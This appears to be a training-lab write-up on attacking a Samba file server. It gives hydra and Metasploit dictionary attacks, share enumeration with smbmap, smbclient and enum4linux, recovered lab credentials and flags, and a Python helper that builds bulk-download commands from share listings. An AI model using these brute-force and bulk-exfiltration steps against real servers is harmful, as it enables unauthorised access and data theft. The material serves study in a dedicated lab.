Exploiting SAMBA
SMB (Server Message Block) is a network file sharing protocol used to share files and peripherals such as printers between computers on a local area network (LAN).
Modern SMB runs directly over TCP on port 445. Originally it ran on top of the NetBIOS session service, which uses TCP port 139.
Samba is the open-source implementation of SMB for Linux and other Unix-like systems; it lets Windows clients access shares and printers hosted on those systems.
Samba authenticates users by username and password before granting access to the server or to a network share. Some shares also allow guest or anonymous (null-session) access, so check for that first, for example with smbclient's -N (no password) option; brute force is only needed when anonymous access is refused.
When no anonymous access is allowed, we can run a dictionary attack against the Samba server to obtain valid credentials.
With valid credentials we can use a utility called SMBMap to enumerate Samba shares, list their contents and download files. SMBMap can also execute remote commands, but that feature relies on Windows service-control RPC and an ADMIN$ share, so it does not apply to a Samba server.
We can also use smbclient, a client that is part of the Samba software suite. It talks to an SMB (LAN Manager) server and offers an interface similar to the ftp program: it can download files from the server to the local machine, upload files from the local machine to the server, and retrieve directory listings from the server.
It is common to find both Windows and Linux systems listening on the NetBIOS session port (139) as well as the direct SMB port (445); the NetBIOS port is kept for compatibility with older systems that still rely on NetBIOS.
In any Windows environment with more than a handful of systems, SMB is the standard way to share files. If someone on the local network asks you to share a file or folder, the expected solution is a file share, and that share can be restricted to specific users. Regardless of such restrictions, a share often holds information that matters to the company or to a particular person, and once it is set up, any permitted user on the LAN can reach those files and folders. All of this is carried over the SMB protocol.
We will focus primarily on enumerating shares and downloading files from them.
The workflow is: first identify valid credentials, then authenticate to the Samba server (that is, to the target over SMB) with them, and finally use those credentials to list the shares, download files from them, and so on. Samba uses username and password authentication just like Windows SMB, so to obtain access to the server or a share we need credentials, and we can obtain them with a dictionary attack, for example with hydra.
Demo: Exploiting SAMBA
ifconfig
eth1: inet 192.56.47.2
nmap -sV 192.56.47.3
Brute-force the Samba service on the target with hydra (here a single user, admin, against a small Unix password list).
hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.56.47.3 smb
Enumerate the shares on the target with the recovered credentials.
smbmap -H 192.56.47.3 -u admin -p password1
Access any of the shares with smbclient.
smbclient
man smbclient
-L: list the shares on the server.
smbclient -L 192.56.47.3 -U admin
Connect to the shawn share with smbclient.
smbclient //192.56.47.3/shawn -U admin
smb: \> ?
smb: \> dir
smb: \> cd dev\
smb: \> dir
smb: \> cd ..
smb: \> cd run
smb: \> dir
smb: \> cd ..
smb: \> cd test
smb: \> dir
smb: \> cd ..
smb: \> exit
smbclient //192.56.47.3/nancy -U admin
smb: \> dir
smb: \> cd srv
smb: \> dir
smb: \> cd ..
smb: \> cd dir
smb: \> dir
smb: \> get flag
smb: \> exit
ls
cat flag
Access the admin share.
smbclient //192.56.47.3/admin -U admin
smb: \> dir
smb: \> cd hidden\
smb: \> dir
smb: \> get flag.tar.gz
smb: \> exit
ls
rm flag
tar xzf flag.tar.gz
ls
cat flag
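The walkthrough above finds the flags by hand, one cd and dir at a time, and has to rm flag before the second download because both files are called flag. As an added example (my code, not smbclient's or the course's), the block below parses the listing that smbclient prints in recurse mode, keeps the regular files with their attributes and sizes, and builds the get commands for a single non-interactive smbclient -c run with collision-free local names. The listing is constructed in the shape of that output from the directory names on this page; notes.txt and its AH (archive, hidden) attributes are invented to show how hidden entries surface.

```python
"""Turn a recursive smbclient listing into a list of files worth fetching.

Added example for this page (not smbclient's or the course's code). The
listing below is constructed in the shape of `smbclient //host/share -U user
-c 'recurse; ls'` output using names from the walkthrough; notes.txt and its
AH attributes are invented.
"""
import re
from dataclasses import dataclass

# One listing row: name, attribute letters (D dir, A archive, H hidden,
# S system, R read-only, N normal), size in bytes, modification time.
_ENTRY = re.compile(
    r"^\s*(?P<name>.+?)\s+(?P<attrs>[ADHNRS]+)\s+(?P<size>\d+)\s+"
    r"(?P<mtime>\w{3}\s+\w{3}\s+\d+\s+\d\d:\d\d:\d\d\s+\d{4})\s*$"
)


@dataclass
class Entry:
    path: str    # share-relative, backslash separated, e.g. \dir\flag
    size: int
    attrs: str

    @property
    def is_dir(self) -> bool:
        return "D" in self.attrs

    @property
    def hidden(self) -> bool:
        return "H" in self.attrs


def parse_listing(text: str) -> list[Entry]:
    """In recurse mode smbclient prints the root rows first, then each
    subdirectory path (e.g. '\\dir') as a header line followed by its rows."""
    cwd = "\\"
    entries = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or "blocks of size" in stripped:
            continue
        if stripped.startswith("\\"):       # directory header
            cwd = stripped
            continue
        m = _ENTRY.match(line)
        if not m or m["name"] in (".", ".."):
            continue
        path = cwd.rstrip("\\") + "\\" + m["name"]
        entries.append(Entry(path, int(m["size"]), m["attrs"]))
    return entries


def files_to_fetch(entries):
    return [e for e in entries if not e.is_dir]


def local_name(path: str) -> str:
    """Flatten \\dir\\flag to dir_flag so two files that are both called
    'flag' (as in the nancy and jane shares on this page) cannot overwrite
    each other on the attacker's side."""
    return path.strip("\\").replace("\\", "_")


def fetch_commands(entries) -> str:
    """Command string for smbclient -c: one quoted get per regular file."""
    return "; ".join(f'get "{e.path}" "{local_name(e.path)}"' for e in files_to_fetch(entries))


SAMPLE_LISTING = r"""
  .                                   D        0  Tue Nov 27 19:25:12 2018
  ..                                  D        0  Tue Nov 27 19:25:12 2018
  dir                                 D        0  Tue Nov 27 19:25:12 2018
  tmp                                 D        0  Tue Nov 27 19:25:12 2018
  srv                                 D        0  Tue Nov 27 19:25:12 2018

\dir
  .                                   D        0  Tue Nov 27 19:25:12 2018
  ..                                  D        0  Tue Nov 27 19:25:12 2018
  flag                                N       33  Tue Nov 27 19:25:12 2018

\tmp
  .                                   D        0  Tue Nov 27 19:25:12 2018
  ..                                  D        0  Tue Nov 27 19:25:12 2018
  notes.txt                          AH      120  Tue Nov 27 19:25:12 2018

\srv
  .                                   D        0  Tue Nov 27 19:25:12 2018
  ..                                  D        0  Tue Nov 27 19:25:12 2018

                1981084628 blocks of size 1024. 46789356 blocks available
"""

if __name__ == "__main__":
    found = parse_listing(SAMPLE_LISTING)
    for e in files_to_fetch(found):
        print(f"{e.path:<20} {e.size:>6} bytes{'  (hidden)' if e.hidden else ''}")
    print(fetch_commands(found))
```

Feed a real listing in with something like smbclient //target/share -U user -c 'recurse; ls' and pass the resulting get string back to smbclient -c; the flattened local names mean the nancy and jane flags land as dir_flag and flag_flag instead of clobbering each other.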
-a: enumerate all information.
enum4linux -a 192.56.47.3
enum4linux -a -u admin -p password1 192.56.47.3
Samba Recon: Dictionary Attack
Reproducing the video content
root@attackdefense:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.1.0.3 netmask 255.255.0.0 broadcast 10.1.255.255
ether 02:42:0a:01:00:03 txqueuelen 0 (Ethernet)
RX packets 117 bytes 10642 (10.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 101 bytes 313114 (305.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.58.213.2 netmask 255.255.255.0 broadcast 192.58.213.255
ether 02:42:c0:3a:d5:02 txqueuelen 0 (Ethernet)
RX packets 46 bytes 5458 (5.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 18 bytes 1656 (1.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18 bytes 1656 (1.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
root@attackdefense:~# nmap -sV 192.58.213.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-10-25 08:57 UTC
Nmap scan report for target-1 (192.58.213.3)
Host is up (0.000010s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: RECONLABS)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: RECONLABS)
MAC Address: 02:42:C0:3A:D5:03 (Unknown)
Service Info: Host: SAMBA-RECON-BRUTE
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.50 seconds
root@attackdefense:~# hydra -l admin -P /usr/share/wordlists/metasploit/unix_passwords.txt 192.58.213.3 smb
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-25 09:02:42
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 1009 login tries (l:1/p:1009), ~1009 tries per task
[DATA] attacking smb://192.58.213.3:445/
[445][smb] host: 192.58.213.3 login: admin password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-10-25 09:02:43
root@attackdefense:~# smbmap -u admin -p password1 -H 192.58.213.3
[+] Finding open SMB ports....
[+] User SMB session establishd on 192.58.213.3...
[+] IP: 192.58.213.3:445 Name: target-1
Disk Permissions
---- -----------
shawn READ, WRITE
nancy READ ONLY
admin READ, WRITE
IPC$ NO ACCESS
-L: this option lets you see which services (shares) are available on a server. Use it as smbclient -L host and a list should appear. It lists the shares available on the server.
-U: username is the user name the client uses to establish the connection, assuming the server is running a protocol that allows user names.
root@attackdefense:~# smbclient -L 192.58.213.3 -U admin
Enter WORKGROUP\admin's password:
Sharename Type Comment
--------- ---- -------
shawn Disk
nancy Disk
admin Disk
IPC$ IPC IPC Service (brute.samba.recon.lab)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
RECONLABS
root@attackdefense:~# smbclient '\\192.58.213.3\shawn' -U admin
Enter WORKGROUP\admin's password:
Try "help" to get a list of possible commands.
smb: \> ?
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \> dir
. D 0 Tue Oct 25 09:04:44 2022
.. D 0 Tue Nov 27 19:25:12 2018
test D 0 Tue Nov 27 19:25:12 2018
dev D 0 Tue Nov 27 19:25:12 2018
run D 0 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 46831332 blocks available
smb: \> cd test
smb: \test\> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Oct 25 09:04:44 2022
1981084628 blocks of size 1024. 46831336 blocks available
smb: \test\> cd ..
smb: \> cd dev
smb: \dev\> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Oct 25 09:04:44 2022
1981084628 blocks of size 1024. 46823104 blocks available
smb: \dev\> cd ..
smb: \> cd run
smb: \run\> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Oct 25 09:04:44 2022
1981084628 blocks of size 1024. 46823100 blocks available
smb: \run\> exit
root@attackdefense:~# smbclient '\\192.58.213.3\nancy' -U admin
Enter WORKGROUP\admin's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Nov 27 19:25:12 2018
dir D 0 Tue Nov 27 19:25:12 2018
tmp D 0 Tue Nov 27 19:25:12 2018
srv D 0 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 46789356 blocks available
smb: \> cd dir
smb: \dir\> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Nov 27 19:25:12 2018
flag N 33 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 46789308 blocks available
smb: \dir\> get flag
getting file \dir\flag of size 33 as flag (10.7 KiloBytes/sec) (average 10.7 KiloBytes/sec)
smb: \srv\> exit
root@attackdefense:~# ls
README flag tools wordlists
root@attackdefense:~# cat flag
a1157f23d040fb4bc6f9a7277de65bf7
root@attackdefense:~# rm flag
root@attackdefense:~# smbclient '\\192.58.213.3\admin' -U admin
Enter WORKGROUP\admin's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Oct 25 09:04:44 2022
.. D 0 Tue Nov 27 19:25:12 2018
hidden D 0 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 46780284 blocks available
smb: \> cd hidden\
smb: \hidden\> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Oct 25 09:04:44 2022
flag.tar.gz N 151 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 46780372 blocks available
smb: \hidden\> get flag.tar.gz
getting file \hidden\flag.tar.gz of size 151 as flag.tar.gz (73.7 KiloBytes/sec) (average 73.7 KiloBytes/sec)
smb: \hidden\> exit
root@attackdefense:~# ls
README flag.tar.gz tools wordlists
root@attackdefense:~# tar zxf flag.tar.gz
root@attackdefense:~# ls
README flag flag.tar.gz tools wordlists
root@attackdefense:~# cat flag
2727069bc058053bd561ce372721c92e
root@attackdefense:~# enum4linux -u admin -p password1 -a 192.58.213.3
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Oct 25 09:31:50 2022
==========================
| Target Information |
==========================
Target ........... 192.58.213.3
RID Range ........ 500-550,1000-1050
Username ......... 'admin'
Password ......... 'password1'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 192.58.213.3 |
====================================================
[+] Got domain/workgroup name: RECONLABS
============================================
| Nbtstat Information for 192.58.213.3 |
============================================
Looking up status of 192.58.213.3
RECONLABS <00> - <GROUP> H <ACTIVE> Domain/Workgroup Name
RECONLABS <1e> - <GROUP> H <ACTIVE> Browser Service Elections
SAMBA-RECON-BRU <00> - H <ACTIVE> Workstation Service
SAMBA-RECON-BRU <03> - H <ACTIVE> Messenger Service
SAMBA-RECON-BRU <20> - H <ACTIVE> File Server Service
MAC Address = 00-00-00-00-00-00
=====================================
| Session Check on 192.58.213.3 |
=====================================
[+] Server 192.58.213.3 allows sessions using username 'admin', password 'password1'
===========================================
| Getting domain SID for 192.58.213.3 |
===========================================
Domain Name: RECONLABS
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
======================================
| OS information on 192.58.213.3 |
======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.58.213.3 from smbclient:
[+] Got OS info for 192.58.213.3 from srvinfo:
SAMBA-RECON-BRUWk Sv PrQ Unx NT SNT brute.samba.recon.lab
platform_id : 500
os version : 6.1
server type : 0x809a03
=============================
| Users on 192.58.213.3 |
=============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: shawn Name: Desc:
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: nancy Name: Desc:
index: 0x3 RID: 0x3e9 acb: 0x00000010 Account: jane Name: Desc:
index: 0x4 RID: 0x3eb acb: 0x00000010 Account: admin Name: Desc:
user:[shawn] rid:[0x3e8]
user:[nancy] rid:[0x3ea]
user:[jane] rid:[0x3e9]
user:[admin] rid:[0x3eb]
=========================================
| Share Enumeration on 192.58.213.3 |
=========================================
Sharename Type Comment
--------- ---- -------
shawn Disk
nancy Disk
admin Disk
IPC$ IPC IPC Service (brute.samba.recon.lab)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
RECONLABS
[+] Attempting to map shares on 192.58.213.3
//192.58.213.3/shawn Mapping: OK, Listing: OK
//192.58.213.3/nancy Mapping: OK, Listing: OK
//192.58.213.3/admin Mapping: OK, Listing: OK
//192.58.213.3/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
====================================================
| Password Policy Information for 192.58.213.3 |
====================================================
[+] Attaching to 192.58.213.3 using admin:password1
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] SAMBA-RECON-BRUTE
[+] Builtin
[+] Password Info for Domain: SAMBA-RECON-BRUTE
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
==============================
| Groups on 192.58.213.3 |
==============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
group:[Testing] rid:[0x3ee]
[+] Getting local group memberships:
[+] Getting domain groups:
group:[Maintainer] rid:[0x3ec]
group:[Reserved] rid:[0x3ed]
[+] Getting domain group memberships:
=======================================================================
| Users on 192.58.213.3 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[I] Found new SID: S-1-22-2
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-3690628376-3985617143-2159776750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-2 and logon username 'admin', password 'password1'
S-1-22-2-1000 Unix Group\admins (Domain Group)
S-1-22-2-1001 Unix Group\Maintainer (Domain Group)
S-1-22-2-1002 Unix Group\Reserved (Domain Group)
S-1-22-2-1003 Unix Group\Testing (Domain Group)
[+] Enumerating users using SID S-1-22-1 and logon username 'admin', password 'password1'
S-1-22-1-1000 Unix User\shawn (Local User)
S-1-22-1-1001 Unix User\jane (Local User)
S-1-22-1-1002 Unix User\nancy (Local User)
S-1-22-1-1003 Unix User\admin (Local User)
[+] Enumerating users using SID S-1-5-21-3690628376-3985617143-2159776750 and logon username 'admin', password 'password1'
S-1-5-21-3690628376-3985617143-2159776750-501 SAMBA-RECON-BRUTE\nobody (Local User)
S-1-5-21-3690628376-3985617143-2159776750-513 SAMBA-RECON-BRUTE\None (Domain Group)
S-1-5-21-3690628376-3985617143-2159776750-1000 SAMBA-RECON-BRUTE\shawn (Local User)
S-1-5-21-3690628376-3985617143-2159776750-1001 SAMBA-RECON-BRUTE\jane (Local User)
S-1-5-21-3690628376-3985617143-2159776750-1002 SAMBA-RECON-BRUTE\nancy (Local User)
S-1-5-21-3690628376-3985617143-2159776750-1003 SAMBA-RECON-BRUTE\admin (Local User)
S-1-5-21-3690628376-3985617143-2159776750-1004 SAMBA-RECON-BRUTE\Maintainer (Domain Group)
S-1-5-21-3690628376-3985617143-2159776750-1005 SAMBA-RECON-BRUTE\Reserved (Domain Group)
S-1-5-21-3690628376-3985617143-2159776750-1006 SAMBA-RECON-BRUTE\Testing (Local Group)
[+] Enumerating users using SID S-1-5-32 and logon username 'admin', password 'password1'
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
=============================================
| Getting printer info for 192.58.213.3 |
=============================================
No printers returned.
enum4linux complete on Tue Oct 25 09:32:08 2022
Overview
In this challenge we look at dictionary attacks against an SMB server. Start the lab and answer the following questions:
Questions
- What is the password of user "jane" required to access share "jane"? Use the smb_login Metasploit module with the password wordlist /usr/share/wordlists/metasploit/unix_passwords.txt
- What is the password of user "admin" required to access share "admin"? Use hydra with the password wordlist /usr/share/wordlists/rockyou.txt
- Which share is read-only? Use smbmap with the credentials obtained in question 2.
- Is share "jane" browseable? Use the credentials obtained in question 1.
- Fetch the flag from share "admin".
- List the named pipes available over SMB on the Samba server. Use the pipe_auditor Metasploit module with the credentials obtained in question 2.
- List the SIDs of the Unix users shawn, jane, nancy and admin respectively by performing RID cycling with enum4linux and the credentials obtained in question 2.
Instructions:
- This lab is dedicated to you! No other users are on this network :)
- Once you start the lab, you will have access to a root terminal of a Kali instance.
- Your Kali has an interface with IP address 192.X.Y.Z. Run "ip addr" to find the values of X and Y.
- The target machine should be located at IP address 192.X.Y.3.
- Do not attack the gateway located at IP address 192.X.Y.1.
My own approach
What is the password of user “jane” required to access share “jane”? Use smb_login metasploit module with password wordlist /usr/share/wordlists/metasploit/unix_passwords.txt
jane:abc123
msf5 auxiliary(scanner/smb/smb_login) > ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.38.66.2 netmask 255.255.255.0 broadcast 192.38.66.255
ether 02:42:c0:26:42:02 txqueuelen 0 (Ethernet)
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.38.66.3
RHOSTS => 192.38.66.3
msf5 auxiliary(scanner/smb/smb_login) > set SMBUser jane
SMBUser => jane
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
PASS_FILE => /usr/share/wordlists/metasploit/unix_passwords.txt
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 192.38.66.3:445 - 192.38.66.3:445 - Starting SMB login bruteforce
[-] 192.38.66.3:445 - 192.38.66.3:445 - Failed: '.\jane:admin',
[-] 192.38.66.3:445 - 192.38.66.3:445 - Failed: '.\jane:123456',
[-] 192.38.66.3:445 - 192.38.66.3:445 - Failed: '.\jane:12345',
[-] 192.38.66.3:445 - 192.38.66.3:445 - Failed: '.\jane:123456789',
[-] 192.38.66.3:445 - 192.38.66.3:445 - Failed: '.\jane:password',
[-] 192.38.66.3:445 - 192.38.66.3:445 - Failed: '.\jane:iloveyou',
[-] 192.38.66.3:445 - 192.38.66.3:445 - Failed: '.\jane:princess',
[-] 192.38.66.3:445 - 192.38.66.3:445 - Failed: '.\jane:1234567',
[-] 192.38.66.3:445 - 192.38.66.3:445 - Failed: '.\jane:12345678',
[+] 192.38.66.3:445 - 192.38.66.3:445 - Success: '.\jane:abc123'
[*] 192.38.66.3:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
What is the password of user “admin” required to access share “admin”? Use hydra with password wordlist: /usr/share/wordlists/rockyou.txt
admin:password1
root@attackdefense:/usr/share/wordlists# ls
dirb dirbuster dnsmap.txt fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt.gz sqlmap.txt wfuzz
root@attackdefense:/usr/share/wordlists# gzip -d rockyou.txt.gz
root@attackdefense:/usr/share/wordlists# ls
dirb dirbuster dnsmap.txt fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt sqlmap.txt wfuzz
root@attackdefense:~# hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.38.66.3 smb
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-25 10:38:30
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.38.66.3:445/
[445][smb] host: 192.38.66.3 login: admin password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-10-25 10:38:32
Which share is read only? Use smbmap with credentials obtained in question 2.
nancy
root@attackdefense:~# smbmap -H 192.38.66.3 -u admin -p password1
[+] Finding open SMB ports....
[+] User SMB session establishd on 192.38.66.3...
[+] IP: 192.38.66.3:445 Name: target-1
Disk Permissions
---- -----------
shawn READ, WRITE
nancy READ ONLY
admin READ, WRITE
IPC$ NO ACCESS
Is share “jane” browseable? Use credentials obtained from the 1st question.
Yes
root@attackdefense:~# smbclient //192.38.66.3/jane -U jane
Enter WORKGROUP\jane's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Nov 27 19:25:12 2018
logs D 0 Tue Nov 27 19:25:12 2018
flag D 0 Tue Nov 27 19:25:12 2018
admin D 0 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 63976192 blocks available
smb: \> cd logs
smb: \logs\> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 63976244 blocks available
smb: \logs\> cd ..
smb: \> cd flag
smb: \flag\> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Nov 27 19:25:12 2018
flag N 33 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 63976188 blocks available
smb: \flag\> get flag
getting file \flag\flag of size 33 as flag (32.2 KiloBytes/sec) (average 32.2 KiloBytes/sec)
smb: \flag\> cd ..
smb: \> cd admin
smb: \admin\> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 63973472 blocks available
smb: \admin\> exit
root@attackdefense:~# cat flag
16cb5a2bebf654439291fc9b73b0a6d0
Fetch the flag from share “admin”
2727069bc058053bd561ce372721c92e
root@attackdefense:~# smbclient //192.38.66.3/admin -U admin
Enter WORKGROUP\admin's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Oct 25 10:42:11 2022
.. D 0 Tue Nov 27 19:25:12 2018
hidden D 0 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 63973232 blocks available
smb: \> cd hidden\
smb: \hidden\> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Oct 25 10:42:11 2022
flag.tar.gz N 151 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 63973392 blocks available
smb: \hidden\> get flag.tar.gz
getting file \hidden\flag.tar.gz of size 151 as flag.tar.gz (147.4 KiloBytes/sec) (average 147.5 KiloBytes/sec)
smb: \hidden\> exit
root@attackdefense:~# rm flag
root@attackdefense:~# tar zxf flag.tar.gz
root@attackdefense:~# ls
README flag flag.tar.gz tools wordlists
root@attackdefense:~# cat flag
2727069bc058053bd561ce372721c92e
List the named pipes available over SMB on the samba server? Use pipe_auditor metasploit module with credentials obtained from question 2.
netlogon, lsarpc, samr, eventlog, InitShutdown, ntsvcs, srvsvc, wkssvc
SMB Session Pipe Auditor
Determine which named pipes are accessible over SMB.
root@attackdefense:~# service postgresql start && msfconsole -q
[ ok ] Starting PostgreSQL 11 database server: main.
msf5 > use auxiliary/scanner/smb/pipe_auditor
msf5 auxiliary(scanner/smb/pipe_auditor) > show options
Module options (auxiliary/scanner/smb/pipe_auditor):
Name Current Setting Required Description
---- --------------- -------- -----------
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target address range or CIDR identifier
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf5 auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 192.38.66.3
RHOSTS => 192.38.66.3
msf5 auxiliary(scanner/smb/pipe_auditor) > set SMBUser admin
SMBUser => admin
msf5 auxiliary(scanner/smb/pipe_auditor) > set SMBPass password1
SMBPass => password1
msf5 auxiliary(scanner/smb/pipe_auditor) > run
[+] 192.38.66.3:139 - Pipes: \netlogon, \lsarpc, \samr, \eventlog, \InitShutdown, \ntsvcs, \srvsvc, \wkssvc
[*] 192.38.66.3: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
List sid of Unix users shawn, jane, nancy and admin respectively by performing RID cycling using enum4Linux with credentials obtained in question 2.
[+] Enumerating users using SID S-1-22-1 and logon username 'admin', password 'password1'
S-1-22-1-1000 Unix User\shawn (Local User)
S-1-22-1-1001 Unix User\jane (Local User)
S-1-22-1-1002 Unix User\nancy (Local User)
S-1-22-1-1003 Unix User\admin (Local User)
root@attackdefense:~# enum4linux -u admin -p password1 -r 192.38.66.3
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Oct 25 11:02:00 2022
==========================
| Target Information |
==========================
Target ........... 192.38.66.3
RID Range ........ 500-550,1000-1050
Username ......... 'admin'
Password ......... 'password1'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===================================================
| Enumerating Workgroup/Domain on 192.38.66.3 |
===================================================
[+] Got domain/workgroup name: RECONLABS
====================================
| Session Check on 192.38.66.3 |
====================================
[+] Server 192.38.66.3 allows sessions using username 'admin', password 'password1'
==========================================
| Getting domain SID for 192.38.66.3 |
==========================================
Domain Name: RECONLABS
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
======================================================================
| Users on 192.38.66.3 via RID cycling (RIDS: 500-550,1000-1050) |
======================================================================
[I] Found new SID: S-1-22-2
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-3690628376-3985617143-2159776750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username 'admin', password 'password1'
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
